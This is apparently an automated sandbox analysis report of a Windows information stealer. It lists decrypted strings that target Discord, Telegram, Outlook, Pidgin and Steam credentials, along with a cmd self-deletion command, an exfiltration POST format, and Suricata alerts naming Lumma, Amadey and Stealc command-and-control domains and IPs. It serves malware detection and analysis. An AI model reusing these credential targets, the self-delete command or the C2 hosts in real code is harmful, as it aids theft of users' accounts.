Source: 28.2.num.exe.e80000.0.unpack String decryptor: msvcp140.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: nss3.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: softokn3.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: vcruntime140.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Temp\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: .exe
Source: 28.2.num.exe.e80000.0.unpack String decryptor: runas
Source: 28.2.num.exe.e80000.0.unpack String decryptor: open
Source: 28.2.num.exe.e80000.0.unpack String decryptor: /c start
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %DESKTOP%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %APPDATA%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %USERPROFILE%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %DOCUMENTS%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %PROGRAMFILES%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %RECENT%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: *.lnk
Source: 28.2.num.exe.e80000.0.unpack String decryptor: files
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \discord\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Local Storage\leveldb
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Telegram Desktop\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: key_datas
Source: 28.2.num.exe.e80000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 28.2.num.exe.e80000.0.unpack String decryptor: map*
Source: 28.2.num.exe.e80000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 28.2.num.exe.e80000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 28.2.num.exe.e80000.0.unpack String decryptor: F8806DD0C461824F*
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Telegram
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Tox
Source: 28.2.num.exe.e80000.0.unpack String decryptor: *.tox
Source: 28.2.num.exe.e80000.0.unpack String decryptor: *.ini
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Password
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 00000001
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 00000002
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 00000003
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 00000004
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Pidgin
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \.purple\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: accounts.xml
Source: 28.2.num.exe.e80000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 28.2.num.exe.e80000.0.unpack String decryptor: token:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Software\Valve\Steam
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SteamPath
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \config\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ssfn*
Source: 28.2.num.exe.e80000.0.unpack String decryptor: config.vdf
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DialogConfig.vdf
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 28.2.num.exe.e80000.0.unpack String decryptor: libraryfolders.vdf
Source: 28.2.num.exe.e80000.0.unpack String decryptor: loginusers.vdf
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Steam\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: browsers
Source: 28.2.num.exe.e80000.0.unpack String decryptor: done
Source: 28.2.num.exe.e80000.0.unpack String decryptor: soft
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Discord\tokens.txt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 28.2.num.exe.e80000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 28.2.num.exe.e80000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 28.2.num.exe.e80000.0.unpack String decryptor: https
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 28.2.num.exe.e80000.0.unpack String decryptor: POST
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HTTP/1.1
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 28.2.num.exe.e80000.0.unpack String decryptor: hwid
Source: 28.2.num.exe.e80000.0.unpack String decryptor: build
Source: 28.2.num.exe.e80000.0.unpack String decryptor: token
Source: 28.2.num.exe.e80000.0.unpack String decryptor: file_name
Source: 28.2.num.exe.e80000.0.unpack String decryptor: file
Source: 28.2.num.exe.e80000.0.unpack String decryptor: message
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 28.2.num.exe.e80000.0.unpack String decryptor: screenshot.jpg
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49904 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49919 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49921 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49931 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49943 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50027 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50099 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50098 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58616 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58618 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58620 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58621 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58623 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58624 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58627 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58629 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58645 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:58647 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58652 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58659 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58658 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:58684 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58686 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58691 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58690 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:58693 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58709 version: TLS 1.2
Source: Binary string: my_library.pdbU source: 1171a5b648.exe, 0000000A.00000003.2488093515.0000000004E2B000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2529289944.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001C.00000002.2604375299.0000000000EAC000.00000008.00000001.01000000.00000013.sdmp, 1171a5b648.exe, 0000001F.00000003.2632031246.0000000004EFB000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2685024844.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr
Source: Binary string: my_library.pdb source: 1171a5b648.exe, 0000000A.00000003.2488093515.0000000004E2B000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2529289944.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001C.00000002.2604375299.0000000000EAC000.00000008.00000001.01000000.00000013.sdmp, 1171a5b648.exe, 0000001F.00000003.2632031246.0000000004EFB000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2685024844.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, 00000002.00000002.1999432818.0000000000192000.00000040.00000001.01000000.00000006.sdmp, QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, 00000002.00000003.1866208811.0000000005110000.00000004.00001000.00020000.00000000.sdmp
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: number of queries: 1413
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Publishers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\SolidDocuments Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Packages Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\CEF Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: firefox.exe Memory has grown: Private usage: 1MB later: 188MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:63537 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:53325 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:58458 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:61756 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:54763 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49733 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49736 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49792 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:55872 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:64014 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:64481 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:49516 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49808
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49843 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49852 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49842 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49860 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49868 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49878 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49890 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49884 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49893 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49904 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:52609 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:64988 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49919 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49916 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49921 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49931 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49945 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49960 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49959 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:60841 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49979 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49994 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50008 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50033 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50043 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:51905 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49943 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50071 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:59249 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:49153 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:63867 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:54906 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58616 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58618 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58620 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58621 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58623 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58624 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58627 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:58626 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58629 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:58669 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49852 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49852 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49893 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49843 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49843 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49931 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49931 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58616 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58616 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:58624 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:58618 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50033 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58618 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58629 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49921 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49921 -> 188.114.97.3:443
